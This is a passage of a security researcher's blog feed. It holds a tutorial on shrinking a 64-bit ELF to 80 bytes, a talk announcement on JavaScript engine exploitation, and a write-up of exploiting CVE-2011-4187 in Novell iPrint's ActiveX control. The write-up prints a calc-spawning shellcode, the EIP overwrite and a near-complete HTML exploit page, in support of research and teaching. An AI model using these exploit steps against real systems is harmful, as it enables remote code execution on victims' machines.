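    ehdr.e_ident[EI_CLASS]   = ELFCLASS64;
    ehdr.e_ident[EI_DATA]    = ELFDATA2LSB;
    ehdr.e_ident[EI_VERSION] = EV_CURRENT;
    ehdr.e_type      = ET_EXEC;
    ehdr.e_machine   = EM_X86_64;
    ehdr.e_version   = EV_CURRENT;
    ehdr.e_entry     = 0x400000 + HDR_SIZE;   /* code sits right after the headers */
    ehdr.e_phoff     = sizeof ehdr;
    ehdr.e_ehsize    = sizeof ehdr;
    ehdr.e_phentsize = sizeof phdr;
    ehdr.e_phnum     = 1;

    phdr.p_type   = PT_LOAD;
    phdr.p_flags  = PF_R | PF_W | PF_X;
    phdr.p_offset = HDR_SIZE;
    phdr.p_vaddr  = 0x400000 + HDR_SIZE;
    phdr.p_paddr  = 0x400000;
    phdr.p_filesz = 0xb0;     /* kept as in the dump, not recomputed */
    phdr.p_memsz  = 0xb0;
    phdr.p_align  = 0x1000;

    memcpy(out, &amp;ehdr, sizeof ehdr);
    memcpy(out + sizeof ehdr, &amp;phdr, sizeof phdr);
    memcpy(out + HDR_SIZE, code, sizeof code);
    return HDR_SIZE + sizeof code;
}

int main(void)
{
    unsigned char image[HDR_SIZE + sizeof code];
    size_t n = build_tiny_elf(image);
    FILE *f = fopen(&quot;smallest_elf_v2.bin&quot;, &quot;wb&quot;);

    if (f == NULL) {
        perror(&quot;fopen&quot;);
        return 1;
    }
    fwrite(image, 1, n, f);
    fclose(f);
    printf(&quot;%zu bytes written\n&quot;, n);
    return 0;
}
</code></pre>
<p>The generated file is not marked executable, so a <code>chmod +x smallest_elf_v2.bin</code> is needed before running it.</p>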
<h3>Going beyond the documentation</h3>
<p>Actually, we can still save a few bytes by taking advantage of the fact that some portions of the header are not verified upon execution, for example the 7-byte &ldquo;padding&rdquo; after the magic bytes or the last elements of the ELF header.</p>
<p>First, let&rsquo;s move our actual code, from the end of the program, directly inside the padding of the ELF header, and update the offsets accordingly. It will no longer be located at <strong>0x78</strong>, but <strong>0x08</strong>.</p>
<p>Then, let&rsquo;s overlap the ELF header and the program header at the very end of the ELF header, by starting the program header at offset <strong>0x38</strong> instead of <strong>0x40</strong>. This works because the original overwritten data is <code>0100 0000</code>, and our program header starts with <code>0100 0000</code> as well.</p>
<p>Which gives us the following binary:</p>
<pre><code>00000000: 7f45 4c46 0201 0100 6a3c 580f 0500 0000  .ELF....j&lt;X.....
00000010: 0200 3e00 0100 0000 0800 4000 0000 0000  ..&gt;.......@.....
00000020: 3800 0000 0000 0000 0000 0000 0000 0000  8...............
00000030: 0000 0000 4000 3800 0100 0000 0700 0000  ....@.8.........
00000040: 0800 0000 0000 0000 0800 4000 0000 0000  ..........@.....
00000050: 0000 4000 0000 0000 b000 0000 0000 0000  ..@.............
00000060: b000 0000 0000 0000 0010 0000 0000 0000  ................
</code></pre>
<p>New size: 112 bytes.</p>
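<p>To see which fields end up sharing bytes once the program header starts at <strong>0x38</strong>, we can ask the compiler for the field offsets. This is a small C sketch using <code>offsetof</code> on the <code>&lt;elf.h&gt;</code> structures, with <code>phoff</code> being just a local name for the new program header offset.</p>
<pre><code class="language-c">#include &lt;elf.h&gt;
#include &lt;stddef.h&gt;
#include &lt;stdio.h&gt;

int main(void)
{
    /* New start of the program header inside the file. */
    const size_t phoff = 0x38;

    /* Last fields of the ELF header. */
    printf(&quot;e_phnum     at 0x%zx\n&quot;, offsetof(Elf64_Ehdr, e_phnum));      /* 0x38 */
    printf(&quot;e_shentsize at 0x%zx\n&quot;, offsetof(Elf64_Ehdr, e_shentsize));  /* 0x3a */
    printf(&quot;e_shnum     at 0x%zx\n&quot;, offsetof(Elf64_Ehdr, e_shnum));      /* 0x3c */
    printf(&quot;e_shstrndx  at 0x%zx\n&quot;, offsetof(Elf64_Ehdr, e_shstrndx));   /* 0x3e */

    /* First fields of the program header, once it is moved to phoff. */
    printf(&quot;p_type      at 0x%zx\n&quot;, phoff + offsetof(Elf64_Phdr, p_type));   /* 0x38 */
    printf(&quot;p_flags     at 0x%zx\n&quot;, phoff + offsetof(Elf64_Phdr, p_flags));  /* 0x3c */
    return 0;
}
</code></pre>
<p>So <code>p_type</code> covers <code>e_phnum</code> and <code>e_shentsize</code>, while <code>p_flags</code> covers <code>e_shnum</code> and <code>e_shstrndx</code>. In the dump above this means <code>e_shnum</code> now reads as 7, which the program evidently tolerates since it still runs.</p>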
<h3>Tricks and more tricks</h3>
<p>The previous idea of overlapping the two headers can actually be applied to a larger scale.</p>
<p>The range from <strong>0x18</strong> to <strong>0x40</strong> can actually contain both ELF header and program header overlapped. The values that can be modified without impacting the program&rsquo;s functionality are in bold.</p>
<table>
<thead>
<tr>
<th>Original ELF header</th>
<th>Original program header</th>
<th>New overlapped header</th>
</tr>
</thead>
<tbody>
<tr>
<td>08</td>
<td>01</td>
<td>01</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>40</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>07</td>
<td>01</td>
</tr>
<tr>
<td>00</td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td>38</td>
<td>08</td>
<td>18</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>08</td>
<td>18</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>40</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>01</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td><strong>40</strong></td>
<td>01</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td>40</td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td>38</td>
<td><strong>00</strong></td>
<td>38</td>
</tr>
<tr>
<td>00</td>
<td><strong>00</strong></td>
<td>00</td>
</tr>
<tr>
<td>01</td>
<td>B0</td>
<td>01</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>07</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td>00</td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
<tr>
<td><strong>00</strong></td>
<td>00</td>
<td>00</td>
</tr>
</tbody>
</table>
<p>By modifying the image address of our program and relocating our code right after the magic number, we get this executable of <strong>80 bytes</strong>:</p>
<pre><code>00000000: 7f45 4c46 6a3c 580f 0500 0000 0000 0000  .ELFj&lt;X.........
00000010: 0200 3e00 0100 0000 0100 0000 0100 0000  ..&gt;.............
00000020: 1800 0000 0000 0000 1800 0000 0100 0000  ................
00000030: 0000 0100 0000 3800 0100 0000 0000 0000  ......8.........
00000040: 0100 0000 0000 0000 0000 0000 0000 0000  ................
</code></pre>
<p>What we notice first is that most tools are lost with this binary. The Linux <code>file</code> command can only tell that this is an ELF, and <code>readelf</code> doesn&rsquo;t like it either.</p>
<pre><code class="language-bash">$ file smallest_elf.bin
smallest_elf.bin: ELF (AROS Research Operating System), unknown class 106

$ readelf -a smallest_elf.bin
ELF Header:
  Magic:   7f 45 4c 46 6a 3c 58 0f 05 00 00 00 00 00 00 00
  Class:                             &lt;unknown: 6a&gt;
  Data:                              &lt;unknown: 3c&gt;
  Version:                           88 &lt;unknown&gt;
  OS/ABI:                            AROS
  ABI Version:                       5
  Type:                              EXEC (Executable file)
  Machine:                           Advanced Micro Devices X86-64
  Version:                           0x1
  Entry point address:               0x1
  Start of program headers:          1 (bytes into file)
  Start of section headers:          24 (bytes into file)
  Flags:                             0x0
  Size of this header:               24 (bytes)
  Size of program headers:           0 (bytes)
  Number of program headers:         1
  Size of section headers:           0 (bytes)
  Number of section headers:         0
  Section header string table index: 1 &lt;corrupt: out of range&gt;
readelf: Warning: possibly corrupt ELF file header - it has a non-zero section header offset, but no section headers

There are no sections to group in this file.

There is no dynamic section in this file.
</code></pre>
<p>The same goes for the GDB debugger: it doesn&rsquo;t recognize the file and refuses to debug it (<em>not in executable format: file format not recognized</em>).</p>
<p>But all things considered, this program actually runs fine and respects all our conditions:</p>
<pre><code class="language-bash"># Normal run
$ ./smallest_elf.bin
$ echo $?
0

# Checking with strace
$ strace ./smallest_elf.bin
execve(&quot;./smallest_elf.bin&quot;, [&quot;./smallest_elf.bin&quot;], 0x7fffd6fb2730 /* 25 vars */) = 0
exit(0)                                 = ?
+++ exited with 0 +++
</code></pre>
<p>New size: 80 bytes.</p>
<p>Just for the sake of art, let&rsquo;s clean up the executable by zeroing all the bytes that are not needed.</p>
<pre><code>00000000: 7f45 4c46 6a3c 580f 0500 0000 0000 0000  .ELFj&lt;X.........
00000010: 0200 3e00 0000 0000 0100 0000 0100 0000  ..&gt;.............
00000020: 1800 0000 0000 0000 1800 0000 0100 0000  ................
00000030: 0000 0000 0000 3800 0100 0000 0000 0000  ......8.........
00000040: 0100 0000 0000 0000 0000 0000 0000 0000  ................
</code></pre>
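<p>To see why this layout still loads, it can help to decode the cleaned-up bytes as a 64-bit ELF header. The following is a minimal Python sketch, not part of the original toolchain: the helper name <code>le</code> is hypothetical, and the field offsets are the standard ELF64 ones. It suggests that the program header starts at offset <code>0x18</code>, inside the ELF header itself, and ends exactly at the end of the file:</p>
<pre><code class="language-python"># Cleaned-up 80-byte binary, copied from the hex dump above.
data = bytes.fromhex(
    '7f45 4c46 6a3c 580f 0500 0000 0000 0000'
    '0200 3e00 0000 0000 0100 0000 0100 0000'
    '1800 0000 0000 0000 1800 0000 0100 0000'
    '0000 0000 0000 3800 0100 0000 0000 0000'
    '0100 0000 0000 0000 0000 0000 0000 0000'
)

def le(offset, size):
    '''Read a little-endian unsigned integer of `size` bytes at `offset`.'''
    return int.from_bytes(data[offset:offset + size], 'little')

# ELF64 header fields at their standard offsets.
e_entry = le(0x18, 8)
e_phoff = le(0x20, 8)
e_phentsize = le(0x36, 2)
e_phnum = le(0x38, 2)

# The single program header (Elf64_Phdr), read at e_phoff.
p_type = le(e_phoff + 0x00, 4)    # 1 is PT_LOAD
p_flags = le(e_phoff + 0x04, 4)   # 1 is PF_X
p_offset = le(e_phoff + 0x08, 8)
p_vaddr = le(e_phoff + 0x10, 8)

# File offset the entry point maps to, assuming the usual
# vaddr-to-offset relation of a PT_LOAD segment.
entry_offset = e_entry - (p_vaddr - p_offset)

print('size         :', len(data))
print('e_phoff      :', hex(e_phoff))
print('header end   :', hex(e_phoff + e_phentsize * e_phnum))
print('e_entry      :', hex(e_entry))
print('p_vaddr      :', hex(p_vaddr))
print('entry offset :', entry_offset)
</code></pre>
<p>Reading the fields by hand with <code>int.from_bytes</code> rather than through an ELF library is deliberate here, since most parsers give up on the corrupted <code>e_ident</code> bytes.</p>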
<h3>Is it the end?</h3>
<p>We have probably reached the limits of the 64-bit ELF format: we produced the smallest possible 64-bit ELF that does not crash upon execution and correctly exits with a 0 status code.</p>
<p>Final size: 80 bytes.</p>
<p>Final binary:</p>
<pre><code>7f454c46 6a3c580f 05000000 00000000 02003e00 00000000 01000000
01000000 18000000 00000000 18000000 01000000 00000000 00003800
01000000 00000000 01000000 00000000 00000000 00000000
</code></pre>]]></description>
    </item>
    <item>
      <title>Javascript engine exploitation methodology</title>
      <link>https://sigreturn.com/blog/javascript-engine-exploitation-methodology/</link>
      <guid isPermaLink="true">https://sigreturn.com/blog/javascript-engine-exploitation-methodology/</guid>
      <pubDate>Thu, 25 May 2023 12:00:00 +0000</pubDate>
      <author>contact@sigreturn.com (Adam Taguirov)</author>
      <category>Vulnerability Research</category>
      <category>browser</category>
      <category>javascript</category>
      <category>exploitation</category>
      <category>talk</category>
      <description><![CDATA[<p>JavaScript engines are now one of the most attacked surfaces of modern operating systems. They run untrusted code from arbitrary websites the moment a tab opens, sit on top of multi-million-line JIT compilers (V8, JavaScriptCore, SpiderMonkey), and run inside a sandbox that, once escaped, often leads straight to remote code execution on the host. The bug classes that dominate browser CVE lists today (typer mistakes in JIT optimisation, type confusion on object shapes, edge cases in property accessors and bounds elimination) all live inside this layer.</p>
<p>The talk below walks through the general methodology of approaching such an engine for offensive research: how to read the relevant parts of a multi-million-line C++ codebase, how to recognise the primitive shapes that lead to <code>addrof</code> / <code>fakeobj</code>, and how those primitives compose into a renderer-RCE chain.</p>
<p>It was given in French at the <strong>Quarks in the Shell 2023</strong> conference, organised by <a href="https://content.quarkslab.com/event-quarks-in-the-shell-2023-ads">Quarkslab</a>.</p>
<iframe src="https://www.youtube-nocookie.com/embed/VaaXB8mrtL0" title="Javascript engine exploitation methodology — Quarks in the Shell 2023" allow="accelerometer; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" allowfullscreen loading="lazy"></iframe>]]></description>
    </item>
    <item>
      <title>Vulnerability research and ActiveX controller exploitation</title>
      <link>https://sigreturn.com/blog/vulnerability-research-activex-controller-exploitation/</link>
      <guid isPermaLink="true">https://sigreturn.com/blog/vulnerability-research-activex-controller-exploitation/</guid>
      <pubDate>Sat, 28 May 2022 12:00:00 +0000</pubDate>
      <author>contact@sigreturn.com (Adam Taguirov)</author>
      <category>Vulnerability Research</category>
      <category>cve</category>
      <category>reverse-engineering</category>
      <category>exploitation</category>
      <category>windows</category>
      <category>buffer-overflow</category>
      <category>activex</category>
      <description><![CDATA[<div class="admonition note">
<p class="admonition-title">CVE-2011-4187</p>
<p>Stack buffer overflow in <code>IppGetDriverSettings2</code> (<code>nipplib.dll</code>, Novell iPrint Client &lt; 5.78). Reachable from a web page via the iPrint ActiveX controller (CLSID <code>36723F97-7AA0-11D4-8919-FF2D71D0D32C</code>) on Windows XP. No public exploit at the time of research.</p>
</div>
<h2>Target</h2>
<p>The starting point was a CVE number and a one-line summary on cvedetails:</p>
<blockquote>
<p>Buffer overflow in the <strong>GetDriverSettings</strong> function in <strong>nipplib.dll</strong> in Novell iPrint Client before 5.78 on Windows allows remote attackers to execute arbitrary code via a long realm field, a different vulnerability than CVE-2011-3173.</p>
</blockquote>
<p>No public exploit, almost no third-party write-up. The client only installs on Windows XP, so the whole engagement runs on a Windows XP SP3 VM with a Windows 10 SDK box for tooling.</p>
<p>The iPrint client ships an ActiveX controller. The CLSID can be retrieved by searching the registry for <code>Novell iPrint</code>:</p>
<p><img alt="Registry Editor entry showing the iPrint controller CLSID" src="img/registry_window.png"></p>
<p>The controller is implemented in <code>ienipp.ocx</code> (in <code>C:\Windows\system32\</code>), with the heavy lifting delegated to <code>nipplib.dll</code> in the same directory. Browsing <code>ienipp.ocx</code> with the OLE/COM Object Viewer from the Windows 10 SDK lists the public methods, including <code>GetDriverSettings</code> (the named CVE target) and a <code>GetDriverSettings2</code> variant.</p>
<p><img alt="OLE/COM Object Viewer browsing the methods exposed by ienipp.ocx" src="img/browsing_ocx_file.png"></p>
<p>The controller can be instantiated and invoked from an HTML page in Internet Explorer:</p>
<pre><code class="language-html">&lt;html&gt;
&lt;object classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C' id='target'/&gt;
&lt;/object&gt;
&lt;script&gt;
target.GetDriverSettings(&quot;uri&quot;, &quot;realm&quot;, &quot;user&quot;, &quot;password&quot;);
&lt;/script&gt;
&lt;/html&gt;
</code></pre>
<p>A quick sanity check using the controller&rsquo;s <code>ShowMessageBox</code> method confirmed the CLSID and the call convention before going further.</p>
<h2>Reaching the vulnerable function</h2>
<p>Loading <code>ienipp.ocx</code> in IDA (it auto-pulls <code>nipplib.dll</code>) and following xrefs to <code>IppGetDriverSettings2</code> lands on a single call site at <code>ienipp.ocx:0x1000AE54</code>. The block leading to that call enforces several conditions:</p>
<p><img alt="Control flow leading to the vulnerable IppGetDriverSettings2 call site" src="img/cftovuln.png"></p>
<p>The first gate is a length check on each of the four method parameters (<code>printerUri</code>, <code>realm</code>, <code>userName</code>, <code>password</code>). Anything above <code>0x200</code> bytes per parameter aborts before the call. The second gate is a function called <code>sub_1000FBD0</code> (renamed <code>important_check</code>) whose return value selects the next jump:</p>
<p><img alt="main_checks block: important_check return value gates the vulnerable call" src="img/main_checks.png"></p>
<p><code>important_check</code> is a thin wrapper around <code>IppMgmtGetServerVersion2</code>, exported by <code>nipplib.dll</code>. The wrapper returns 0 when <code>IppMgmtGetServerVersion2</code> itself returns 0; the call site treats that as success and proceeds to the vulnerable call.</p>
<p><code>IppMgmtGetServerVersion2</code> is a one-line forwarder to <code>sub_5C04B514</code>, where the actual logic lives:</p>
<p><img alt="Control flow graph of sub_5C04B514" src="img/sub_5C04B514.png"></p>
<p>A first-pass reading suggests this function performs the IPP server handshake on port 631 and only succeeds when a real server replies correctly. That would mean emulating an IPP server before any vulnerability work is possible. Reading the CFG without that assumption reveals a more useful structure.</p>
<p>The first conditional jump branches on <code>IppCreateServerRef</code>&rsquo;s return value:</p>
<p><img alt="First conditional jump in sub_5C04B514, branching on IppCreateServerRef" src="img/first_jump.png"></p>
<p>If <code>IppCreateServerRef</code> returns <code>NULL</code>, control flow lands directly on a <code>mov eax, 0; ret</code> block. The function returns <code>0</code>, which is the success code for <code>IppMgmtGetServerVersion2</code>. An allocation/setup failure is being treated as a successful version probe. The IPP handshake never runs: no connection to port 631, no negotiation. The vulnerable call site is reached as long as <code>IppCreateServerRef</code> fails, which is the opposite of what the rest of the function is trying to achieve.</p>
<h2>Forcing IppCreateServerRef to fail</h2>
<p><code>IppCreateServerRef</code> calls a helper <code>sub_50022960</code> and propagates its return value: non-zero from the helper means failure for <code>IppCreateServerRef</code>, which is what is needed.</p>
<p><code>sub_50022960</code> performs two length checks on the <code>printerUri</code> argument. The first is on the total URL length (capped at <code>0x200</code>), but that ceiling is already enforced upstream by the per-parameter <code>0x200</code> cap, so it cannot be tripped here without violating the upstream gate. The second check, located further into the function, validates the length of the substring preceding <code>://</code>:</p>
<p><img alt="Length check on the URL prefix before &quot;://&quot;" src="img/searching_fail_bloc_3.png"></p>
<p>If that prefix exceeds <code>0x100</code> bytes, the function fails. The constraints are therefore:</p>
<ul>
<li>prefix before <code>://</code> must be longer than <code>0x100</code> bytes (to fail <code>sub_50022960</code>),</li>
<li>total URL length must stay under <code>0x200</code> bytes (to pass the <code>ienipp.ocx</code> per-parameter gate).</li>
</ul>
<p>A URL of the form <code>&lt;260-byte garbage&gt;://&lt;short-suffix&gt;</code> satisfies both. With this, <code>IppCreateServerRef</code> returns <code>NULL</code>, <code>IppMgmtGetServerVersion2</code> returns <code>0</code>, <code>important_check</code> returns <code>0</code>, and <code>IppGetDriverSettings2</code> is invoked with attacker-controlled arguments.</p>
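<p>The two constraints can be checked mechanically before building the HTML page. The snippet below is a minimal sketch, assuming the limits quoted above; <code>build_printer_uri</code>, <code>PREFIX_LIMIT</code> and <code>TOTAL_LIMIT</code> are hypothetical names, and whether the real comparisons are strict is an assumption:</p>
<pre><code class="language-python"># Limits taken from the constraints listed above.
PREFIX_LIMIT = 0x100   # inner check on the part before '://'
TOTAL_LIMIT = 0x200    # upstream cap on the whole printerUri parameter

def build_printer_uri(prefix_len=260, suffix='x'):
    '''Return a URI whose prefix exceeds PREFIX_LIMIT while the total length fits.'''
    uri = 'A' * prefix_len + '://' + suffix
    prefix = uri.split('://', 1)[0]
    # The prefix must be too long for the helper to accept it.
    if not len(prefix) > PREFIX_LIMIT:
        raise ValueError('prefix too short to make the helper fail')
    # The whole URI must still pass the upstream gate (assumed strict).
    if not TOTAL_LIMIT > len(uri):
        raise ValueError('URI too long for the upstream gate')
    return uri

uri = build_printer_uri()
print(len(uri), uri[:4], uri[-4:])
</code></pre>
<p>With the default arguments the prefix is 260 bytes and the whole URI is 264 bytes, which leaves room in the suffix for any marker a later check requires.</p>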
<h2>The buffer overflow</h2>
<p><code>IppGetDriverSettings2</code> itself contains one more gate before any vulnerable code: an <code>strstr</code> looking for the literal <code>iPrint-driver-profile-hiddenPA</code> inside the URL.</p>
<p><img alt="strstr check on iPrint-driver-profile-hiddenPA" src="img/check_before_vuln_code.png"></p>
<p>Including that substring in the URL passes the check. There is presumably a legitimate reason for it inside the driver profile flow; for the purpose of reaching the bug it is enough to embed it in the suffix.</p>
<p>Past that gate, the <code>realm</code> parameter is fed unchecked into a <code>strcpy</code> whose destination is a fixed-size stack buffer:</p>
<p><img alt="strcpy taking realm as source, with no length check on the destination" src="img/interesting_strcpy.png"></p>
<p>A <code>realm</code> of, say, <code>0x180</code> bytes overflows the buffer well into the saved return address territory.</p>
<h2>Exploitation</h2>
<h3>Crashing on the saved EIP</h3>
<p>The first crash, with <code>realm</code> filled with <code>A</code>s up to the upstream cap, lands inside a <code>strlen</code>:</p>
<p><img alt="Initial crash inside strlen, EBX = 0x41414141" src="img/inspect_registers.png"></p>
<p>The overflow happened, but it also corrupted a pointer (loaded into EBX) that a later call in the same frame dereferences before the function returns. The crash is on a downstream consumer, not on the saved EIP.</p>
<p>The remedy is a shorter <code>realm</code> that overruns the buffer precisely up to the saved EIP and no further:</p>
<p><img alt="Crash with EIP = 0x41414141 after the ret instruction" src="img/correct_crash.png"></p>
<p>EIP is now under control. There are no DEP/ASLR concerns to discuss on Windows XP SP3 in this configuration.</p>
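<p>The exact length can be found by shortening the input step by step. A common alternative, which is not necessarily what was done here, is a cyclic pattern whose 4-byte windows are unique, so that the value observed in EIP gives the offset directly. A minimal sketch, with hypothetical helper names:</p>
<pre><code class="language-python">import itertools
import string

def cyclic_pattern(length):
    '''Build a pattern of unique 3-character chunks: Aa0Aa1Aa2...'''
    chunks = itertools.product(
        string.ascii_uppercase, string.ascii_lowercase, string.digits)
    text = ''.join(''.join(chunk) for chunk in chunks)
    return text[:length].encode('ascii')

def offset_of(eip_value, length=0x200):
    '''Return the pattern offset of the 4 bytes seen in EIP, or -1 if absent.'''
    needle = eip_value.to_bytes(4, 'little')   # x86 stores the low byte first
    return cyclic_pattern(length).find(needle)

# Illustrative values only, not taken from the original debugging session.
print(offset_of(0x41306141))   # bytes 'Aa0A', start of the pattern
print(offset_of(0x41306241))   # bytes 'Ab0A'
</code></pre>
<p>The pattern would be sent as <code>realm</code>, and the number returned for the crashing EIP value is the amount of padding to place before the return address.</p>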
<h3>Placing a shellcode</h3>
<p>The realm field is too constrained to host both the EIP overwrite and a shellcode. The other method parameters, however, are pushed on the stack ahead of <code>realm</code> and are not subject to the same downstream processing. <code>userName</code> is the natural carrier.</p>
<p>A pop-calc shellcode for Windows XP SP3 EN (<a href="http://shell-storm.org/shellcode/files/shellcode-739.php">shell-storm 739</a>):</p>
<pre><code class="language-asm">&quot;\x31\xC9&quot;             // xor ecx,ecx
&quot;\x51&quot;                 // push ecx
&quot;\x68\x63\x61\x6C\x63&quot; // push 0x636c6163  ('calc')
&quot;\x54&quot;                 // push esp
&quot;\xB8\xC7\x93\xC2\x77&quot; // mov  eax, 0x77c293c7
&quot;\xFF\xD0&quot;             // call eax
</code></pre>
<p><code>xxd -p -r</code> is enough to splice the bytes into the HTML payload&rsquo;s <code>userName</code> argument.</p>
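<p>The same conversion can be sketched in Python, which also makes a couple of sanity checks easy. This is an illustration only: the NUL-byte check assumes the parameter is handled as a C string somewhere along the way, which is not confirmed above.</p>
<pre><code class="language-python"># Shellcode bytes from the listing above, as a hex string.
shellcode = bytes.fromhex(
    '31c9'         # xor ecx, ecx
    '51'           # push ecx
    '6863616c63'   # push 'calc'
    '54'           # push esp
    'b8c793c277'   # mov eax, 0x77c293c7
    'ffd0'         # call eax
)

# Assumption: a NUL byte would truncate the string before it reaches the stack.
has_nul = 0 in shellcode

# The immediate of the push spells 'calc' in memory order.
pushed = shellcode[4:8]

# The call target is stored little-endian after the 0xb8 opcode.
target = int.from_bytes(shellcode[10:14], 'little')

print(len(shellcode), has_nul, pushed, hex(target))
</code></pre>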
<h3>Reading the shellcode address</h3>
<p>Running a non-malicious payload (long <code>printerUri</code> prefix to satisfy the bypass, but no overflow on <code>realm</code>) and breakpointing on <code>IppGetDriverSettings2</code> exposes its arguments on the stack. The third argument (<code>userName</code>) holds the buffer address:</p>
<p><img alt="Stack frame at IppGetDriverSettings2: userName address visible" src="img/get_sc_address.png"></p>
<p><code>0x02843728</code> for this run. The Windows XP SP3 process layout is stable enough across launches that this address holds for the next call as long as the process is not restarted.</p>
<h3>Final payload</h3>
<p>Replacing the <code>0x41414141</code> filler at the saved-EIP offset with <code>0x02843728</code> (little-endian) redirects execution into the shellcode after the <code>ret</code>:</p>
<pre><code class="language-html">&lt;html&gt;
&lt;object classid='clsid:36723F97-7AA0-11D4-8919-FF2D71D0D32C' id='target'/&gt;
&lt;/object&gt;
&lt;script&gt;
target.GetDriverSettings(
  &quot;&lt;260-byte garbage&gt;://iPrint-driver-profile-hiddenPA&quot;,
  &quot;&lt;padding up to saved EIP&gt;&lt;\x28\x37\x84\x02&gt;&quot;,
  &quot;&lt;calc shellcode bytes&gt;&quot;,
  &quot;A&quot;);
&lt;/script&gt;
&lt;/html&gt;
</code></pre>
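<p>The byte order of the return address in the <code>realm</code> argument can be double-checked with a short Python sketch. The function name <code>build_realm</code> and the padding length used in the example call are placeholders, not values from the analysis:</p>
<pre><code class="language-python">def build_realm(offset_to_eip, shellcode_addr):
    '''Filler up to the saved EIP, followed by the little-endian address.'''
    packed = shellcode_addr.to_bytes(4, 'little')
    # strcpy stops at the first NUL byte, so the address must not contain one.
    if 0 in packed:
        raise ValueError('address contains a NUL byte')
    return b'A' * offset_to_eip + packed

# Address of the userName buffer observed in the debugger for this run.
packed = (0x02843728).to_bytes(4, 'little')
print(packed.hex())   # 28378402

# Placeholder offset, for illustration only.
realm = build_realm(16, 0x02843728)
print(len(realm), realm[-4:].hex())
</code></pre>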
<p>Loading the page in Internet Explorer:</p>
<p><img alt="calc.exe spawned by the iPrint ActiveX controller" src="img/win.png"></p>
<p>Arbitrary code execution from a single HTML page, no IPP server.</p>
<h2>Failed paths</h2>
<p>Two earlier attempts did not reach the result and are worth recording.</p>
<h3>Emulating the IPP server</h3>
<p>Before noticing the <code>IppCreateServerRef</code>-fails-as-success path, the obvious approach was to make <code>IppMgmtGetServerVersion2</code> succeed legitimately by serving the requests it issues to port 631. Capturing the request with <code>nc -lvp 631</code> showed:</p>
<pre><code>POST /ipp/IppSrvr HTTP/1.1
Accept: application/ipp
User-Agent: Novell iPrint Client - v05.74.00
Content-type: application/ipp
...

@G..attributes-charset.utf-8.H..attributes-natural-language.en-us.D.operation-name.get-server-version.server-version.1.1
</code></pre>
<p>Reversing the response-validation function (<code>nipplib.5C0450B3</code>) listed the constraints: a 2-byte version number that must be <code>0x100</code> or <code>0x101</code>, a valid IPP HTTP header (taken verbatim from a CUPS server&rsquo;s reply), and a <code>server-version</code> attribute located via <code>IppFindAttributeInSet</code>. Encoding the attribute group correctly required reading <a href="https://datatracker.ietf.org/doc/html/rfc8010">RFC 8010</a>. The reply parsed up to a point, but every iteration crashed inside a <code>strlen</code> on a <code>NULL</code> argument, suggesting another mandatory attribute or data field that was not being supplied. The path was abandoned when the logic-bug shortcut surfaced.</p>
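<p>For reference, the RFC 8010 wire format of such a reply body can be sketched in a few lines of Python. This is not the reply that was actually sent, and it is not known to satisfy the client: the helper names are hypothetical, and the value tag and value chosen for <code>server-version</code> are guesses.</p>
<pre><code class="language-python">def encode_attribute(value_tag, name, value):
    '''Encode one attribute: value-tag, name-length, name, value-length, value.'''
    name_b = name.encode('ascii')
    value_b = value.encode('utf-8')
    return (
        bytes([value_tag])
        + len(name_b).to_bytes(2, 'big') + name_b
        + len(value_b).to_bytes(2, 'big') + value_b
    )

def build_response(version, status, request_id, attributes):
    '''Assemble an IPP response body with one operation-attributes group.'''
    body = version.to_bytes(2, 'big')       # version-number, e.g. 0x0101
    body += status.to_bytes(2, 'big')       # status-code, 0x0000 is successful-ok
    body += request_id.to_bytes(4, 'big')   # request-id
    body += b'\x01'                         # operation-attributes-tag
    body += b''.join(attributes)
    body += b'\x03'                         # end-of-attributes-tag
    return body

attrs = [
    encode_attribute(0x47, 'attributes-charset', 'utf-8'),            # charset
    encode_attribute(0x48, 'attributes-natural-language', 'en-us'),   # naturalLanguage
    # Assumption: server-version as a keyword (0x44) with a made-up value.
    encode_attribute(0x44, 'server-version', '1.1'),
]
reply = build_response(0x0101, 0x0000, 1, attrs)
print(reply.hex())
</code></pre>
<p>All multi-byte integers are big-endian, as the RFC requires, which is the opposite of the byte order used for the addresses elsewhere in this write-up.</p>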
<h3>Overflowing the ciphertext, not the cleartext</h3>
